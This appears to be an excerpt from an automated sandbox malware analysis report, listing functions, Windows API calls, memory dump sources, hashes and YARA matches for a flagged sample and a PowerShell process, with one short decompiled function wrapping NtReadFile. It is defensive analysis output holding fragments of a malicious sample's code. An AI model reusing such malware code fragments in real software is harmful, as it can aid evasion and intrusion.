Opcode Fuzzy Hash: eeab817d84ea207a3675854f0dfba94a91058e8abd3d2f2e04914c77f0574758
Instruction Fuzzy Hash: EC1114B6D003498FDB14CFAAD444BDEFBF4AB89314F11852AD515B7200C375AA49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0181BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0181BE0E

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 498dec5b217cdd5936e392b2c7133ff9cdb48dcee5300b8c3b5a3d6516470acc
Instruction ID: e164e857d088ce922065acd47b68504b1e1cdcee77186d2a9bd63696c14bc008
Opcode Fuzzy Hash: 498dec5b217cdd5936e392b2c7133ff9cdb48dcee5300b8c3b5a3d6516470acc
Instruction Fuzzy Hash: F811DFB6D006498FDB10CF9AC444BDEFBF8EB88324F15845AD929A7604C378A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0181DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0181DF1D

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e31ea4c2b691c459fa0f136cd7772604276b988d7daa9bb9eff9204401ce915e
Instruction ID: 969dced426ca3bed950472b1992f5790591188a501bfd7d7d299c4803c56c50c
Opcode Fuzzy Hash: e31ea4c2b691c459fa0f136cd7772604276b988d7daa9bb9eff9204401ce915e
Instruction Fuzzy Hash: 3011D0B69002499FDB10CF99D589BDEBBF8EB88324F10851AE915A7700C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0181C2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5214e0d18ee5855b9af1fd13b459701e7fc0fb3ce01342b878adb7dbcd96d6db
Instruction ID: b3e33f75901753c696e3b0e8a9a527c97324be0700cf5ae039a04945825bf692
Opcode Fuzzy Hash: 5214e0d18ee5855b9af1fd13b459701e7fc0fb3ce01342b878adb7dbcd96d6db
Instruction Fuzzy Hash: 40526AB1501706CFD730CF18E8C85997BB1FB41328F984A18D661ABAD9D3B8678ADF44

Uniqueness

Uniqueness Score: -1.00%

Function 01819990, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed358a14a289861739b88e8b24d0a28306c1e042fe7d4722d61fee318f6325e5
Instruction ID: 572545646512af5fd9bdc3c099e04bc9a18ea9b61361ed8a939a667716d794ae
Opcode Fuzzy Hash: ed358a14a289861739b88e8b24d0a28306c1e042fe7d4722d61fee318f6325e5
Instruction Fuzzy Hash: 8FA17232E0061A8FCF05DFA9C8445DEBBB6FF85304B15856AE905FB225EB319A55CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 6208 Parent PID: 3560 powershell.exeCOMMON

Executed Functions

Function 0479F42C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2351f80c2821bd47ff352f494e83166d4f96710b3810ae6cc8db85b9b7ab69a1
Instruction ID: 0674643f37a64f0e7af88f75c5c811c94dde861b218664652fe1decd6f94f9b6
Opcode Fuzzy Hash: 2351f80c2821bd47ff352f494e83166d4f96710b3810ae6cc8db85b9b7ab69a1
Instruction Fuzzy Hash: C221F471604244DFCF05DF50E8C4B2ABFA1FB88314F24C5A9E9098B356D336E816DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0479F080, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8297fd1297569bf201d14bb2dcb9b3e804cfd755388176f7a7e6b8d83ffe129d
Instruction ID: bb8dd53d9ac3d105b50628d71e413c1de9e5e391bd12a2e683a35bbaf07b212d
Opcode Fuzzy Hash: 8297fd1297569bf201d14bb2dcb9b3e804cfd755388176f7a7e6b8d83ffe129d
Instruction Fuzzy Hash: CB2107B5644244EFCF14DF14E8C0B26BBA5FB84314F24C969E9098B346D33AEC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0479F427, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fb3b6f8daf1189a712b5d3ff58d8178051c95c5dd4ed7a8640c189f132a955
Instruction ID: acfffacc5bf2ff1e4e11f8e8d1496d647b757cb0423f5e44be7a8ae6dddf2a50
Opcode Fuzzy Hash: 32fb3b6f8daf1189a712b5d3ff58d8178051c95c5dd4ed7a8640c189f132a955
Instruction Fuzzy Hash: 0D218C76504240DFCF16CF10E9C4B16BFA2FB44314F24C6A9D9098B266C33AE86ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 0479F07B, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9249ad72f2dea55ea2b3eed9e689e54096b4ad105449ee34b81666ed0c95bced
Instruction ID: f505dc8d8da5b9e72c10b4eb29f4a19d5ca0bc220b9c22b0ed73e95804d2ad6f
Opcode Fuzzy Hash: 9249ad72f2dea55ea2b3eed9e689e54096b4ad105449ee34b81666ed0c95bced
Instruction Fuzzy Hash: 53118B75544284DFCF15CF14E9C4B15BBA2FB84314F24C6AAD8498B756C33AE84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0479D01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4827de72471f8bcc19f5bc5d0e72f8c5d78b64cad2c642a849fe9158a0fb5df9
Instruction ID: 967e2b7a8a86544c7e2727729c33ec1b67f4599347b02fc65219081b4c9a5d9a
Opcode Fuzzy Hash: 4827de72471f8bcc19f5bc5d0e72f8c5d78b64cad2c642a849fe9158a0fb5df9
Instruction Fuzzy Hash: DE01FC71508344BADB204E2AFCC4767FFC8EF41628F048519ED045B346D379AC05C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0479D007, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438753962.000000000479D000.00000040.00000001.sdmp, Offset: 0479D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a8049485d0c6c90b3f9660e01010c75648ced2206a0c0211c8d78a4804a6e7
Instruction ID: 0e3fefb4681ddfbc9d521340d04ccf693e720a7405a54cb355b2a8f6f93f44a5
Opcode Fuzzy Hash: f1a8049485d0c6c90b3f9660e01010c75648ced2206a0c0211c8d78a4804a6e7
Instruction Fuzzy Hash: FA01716140D3C45FD7128B259C94B62BFB4EF43628F1984DBE9848F297C2695C49C772

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Ms5nQdSz5l.exe PID: 6452 Parent PID: 3560 Ms5nQdSz5l.exeCOMMON

Executed Functions

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A002, 0041A010
BMA, xrefs: 0041A01D, 0041A024

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01139910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113991A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 786a3b34f1668c44fdd364189bc099ca25717ce3d8ad8ee932ed19144f91c26a
Instruction ID: 4d665e2304d91badcd45f2ea80d6172b5ca1dab6bb73c9e090cb28fb4bd4252a
Opcode Fuzzy Hash: 786a3b34f1668c44fdd364189bc099ca25717ce3d8ad8ee932ed19144f91c26a
Instruction Fuzzy Hash: 709002B130100403D944719955047460005A7E0751F51C015A5055594EC7998DD576A9

Uniqueness

Uniqueness Score: -1.00%

Function 011399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011399AA

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec66efc66185ac3da19d13f1a9eb1ca671f62242fb9f79707cf08bd4fa5476c8
Instruction ID: b1644171eee2841826f2574939f0c13644095579088cc68fca1d9335e15b6c2a
Opcode Fuzzy Hash: ec66efc66185ac3da19d13f1a9eb1ca671f62242fb9f79707cf08bd4fa5476c8
Instruction Fuzzy Hash: A89002B134100443D90461995514B060005E7F1751F51C019E1055594DC759CC52716A

Uniqueness

Uniqueness Score: -1.00%

Function 01139840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113984A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd3304406254d8f13aee9664d3538e0ec63223c6c29387d3760286d68e6a2619
Instruction ID: 244610f2c492f0db7d9df2218ac86cfca13e099fbd5e18c5558992380f11978e
Opcode Fuzzy Hash: bd3304406254d8f13aee9664d3538e0ec63223c6c29387d3760286d68e6a2619
Instruction Fuzzy Hash: BE900271342041535D49B19955045074006B7F0691791C016A1405990CC6669856E665

Uniqueness

Uniqueness Score: -1.00%

Function 01139860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113986A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f701a77af278721f3b321c034a5c6856d8da27231cc54486ee3b9dbfe83b82bc
Instruction ID: 973b2df3ef93e6f341729cf57ace89b43c85c49c0b4e135dc1d2d22b87e2e9f8
Opcode Fuzzy Hash: f701a77af278721f3b321c034a5c6856d8da27231cc54486ee3b9dbfe83b82bc
Instruction Fuzzy Hash: D590027130100413D915619956047070009A7E0691F91C416A0415598DD7968952B165

Uniqueness

Uniqueness Score: -1.00%

Function 011398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011398FA

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b60c9515518e3687938ac3655557ca1fdd598c2d270e4be605a1b4755e71d8c
Instruction ID: 9431a19cb726f67ecc1478fc45d48a4250bdddada378ea3df54eee3d9f3ce365
Opcode Fuzzy Hash: 4b60c9515518e3687938ac3655557ca1fdd598c2d270e4be605a1b4755e71d8c
Instruction Fuzzy Hash: 1C90027170100503D90571995504616000AA7E0691F91C026A1015595ECB658992B175

Uniqueness

Uniqueness Score: -1.00%

Function 01139A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01139A0A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96a98e89b69009c8214932234fdd35de569b865ef6b88e5ccaf454db053bad87
Instruction ID: 67517830399e95470f3dd6cabab08f3b476acd04a3e4c2c07871b32b6640e143
Opcode Fuzzy Hash: 96a98e89b69009c8214932234fdd35de569b865ef6b88e5ccaf454db053bad87
Instruction Fuzzy Hash: 1790027130140403D9046199591470B0005A7E0752F51C015A1155595DC765885175B5

Uniqueness

Uniqueness Score: -1.00%

Function 01139A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01139A2A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 83fad150197e16edef0a114065524cabae1a515c4770befb01ac1ee94324bc54
Instruction ID: 528838dd1e17f24225d7bbf45c7ce36684d15bba0ccb9b1b4e90fc513abd76ce
Opcode Fuzzy Hash: 83fad150197e16edef0a114065524cabae1a515c4770befb01ac1ee94324bc54
Instruction Fuzzy Hash: AC90027170100043494471A999449064005BBF1661751C125A0989590DC699886566A9

Uniqueness

Uniqueness Score: -1.00%

Function 01139A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01139A5A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d351c5e1acbbc8a4ca49459f487670c66d5108228c506f14a66ac24aea3ad9a3
Instruction ID: cfd859c37eea5da7af6b8291a881863a2b2f4ae776405510b6ccfa009270d21f
Opcode Fuzzy Hash: d351c5e1acbbc8a4ca49459f487670c66d5108228c506f14a66ac24aea3ad9a3
Instruction Fuzzy Hash: 2F90027131180043DA0465A95D14B070005A7E0753F51C119A0145594CCA5588616565

Uniqueness

Uniqueness Score: -1.00%

Function 01139540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113954A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85597da755fd06631a0b56fcee461503243ae664c669337d83c33bd8016fe462
Instruction ID: 5a030721dd4ffd038a2ecf12f3649fac2d9a424424f00afe03b8d036e468495c
Opcode Fuzzy Hash: 85597da755fd06631a0b56fcee461503243ae664c669337d83c33bd8016fe462
Instruction Fuzzy Hash: B2900275311000030909A59917045070046A7E57A1351C025F1006590CD76188616165

Uniqueness

Uniqueness Score: -1.00%

Function 011395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011395DA

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55452200b1c65ab17347af14180951deb24d828ec078a86ee5c717d9cf9bfcbf
Instruction ID: 3ce414874420078e4251248f47f8f0fd39e814a928f2ead32d164f4b478db0bf
Opcode Fuzzy Hash: 55452200b1c65ab17347af14180951deb24d828ec078a86ee5c717d9cf9bfcbf
Instruction Fuzzy Hash: 7E9002B130200003490971995514616400AA7F0651B51C025E10055D0DC66588917169

Uniqueness

Uniqueness Score: -1.00%

Function 01139710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113971A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 198287d1c4fa6c2790679950207fae6688b852aca9f9fc594f70fad25c7e3ff6
Instruction ID: 7741e8245a2d7a630896fea978fbb38ff7f11a013d9ffe3ebe31e6a26dd95d2b
Opcode Fuzzy Hash: 198287d1c4fa6c2790679950207fae6688b852aca9f9fc594f70fad25c7e3ff6
Instruction Fuzzy Hash: AC90027130100403D90465D965086460005A7F0751F51D015A5015595EC7A588917175

Uniqueness

Uniqueness Score: -1.00%

Function 01139780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113978A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c84759213a3f5e01527c92198e6eac7b43abe20f9818508558fb6be69a48eeb
Instruction ID: eae6e6e5502e0e74aa0dd757a670890e6363e8ca72c064278632d73388ec9791
Opcode Fuzzy Hash: 2c84759213a3f5e01527c92198e6eac7b43abe20f9818508558fb6be69a48eeb
Instruction Fuzzy Hash: 2190027931300003D9847199650860A0005A7E1652F91D419A0006598CCA5588696365

Uniqueness

Uniqueness Score: -1.00%

Function 011397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011397AA

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a784e609d2a788a12ba5ff9c569602f09e61a1ed6791e608dfbd51237781dddd
Instruction ID: 728c9b976c44fb6ec94998fbb4aaaa4723e0eb40cba836c45cc572fa4f9fa468
Opcode Fuzzy Hash: a784e609d2a788a12ba5ff9c569602f09e61a1ed6791e608dfbd51237781dddd
Instruction Fuzzy Hash: 9490027130100003D944719965186064005F7F1751F51D015E0405594CDA5588566266

Uniqueness

Uniqueness Score: -1.00%

Function 01139660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0113966A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b82766ae1315af3baa8bec6a26ba3eefc2f48fb890732df5866b4e1bcb24cb7
Instruction ID: 8435e9d5b0f2204a525746ba711e24bc03c709f2452edde69d87fb758dedb2ba
Opcode Fuzzy Hash: 0b82766ae1315af3baa8bec6a26ba3eefc2f48fb890732df5866b4e1bcb24cb7
Instruction Fuzzy Hash: 6E90027130100803D9847199550464A0005A7E1751F91C019A0016694DCB558A5977E5

Uniqueness

Uniqueness Score: -1.00%

Function 011396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011396EA

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d09e26c7e653cb16c3834bb2473af34966ee7605c569de3174d204e5b1e0f508
Instruction ID: fb397943238f639c1e72ebdcd44bd1372eb475d2a5fa779ee106571c606d5f45
Opcode Fuzzy Hash: d09e26c7e653cb16c3834bb2473af34966ee7605c569de3174d204e5b1e0f508
Instruction Fuzzy Hash: 0F90027130108803D9146199950474A0005A7E0751F55C415A4415698DC7D588917165

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082EB, Relevance: 1.6, APIs: 1, Instructions: 54threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: faf8cf098ee7f219147519a05d514d50deb6e27462c733311fa982ed8d3a76b6
Instruction ID: 26bcdf4ce609783375ed328614250b3e6bdca019aeaf666c68d8eb7fda10593a
Opcode Fuzzy Hash: faf8cf098ee7f219147519a05d514d50deb6e27462c733311fa982ed8d3a76b6
Instruction Fuzzy Hash: D001F731A803287BE720A6949D03FFE776CAB80B15F05411EFF04BA1C1DAB96A1547E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A392, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7de5ede88f61204091e7d0ceb7d97c629483a9a823b5be6aa58d5f3fe3666cdf
Instruction ID: 457e7a19fa8fd5a764f04cc234f9934f49200a015b96426f6ce33cdb5da96e61
Opcode Fuzzy Hash: 7de5ede88f61204091e7d0ceb7d97c629483a9a823b5be6aa58d5f3fe3666cdf
Instruction Fuzzy Hash: DD018CB5204248ABCB10DF68CC90EEB77A9EF89314F14825AFD0C57242C634E825CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A232, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e46d3f20cf305cd0d264707020df20be4e9162e48c3b996a68baec1a039c5b1f
Instruction ID: f68bbcc8fb3197226c81c6bdb5b478c15918a34c36bb2cf9231dd03625a3cb29
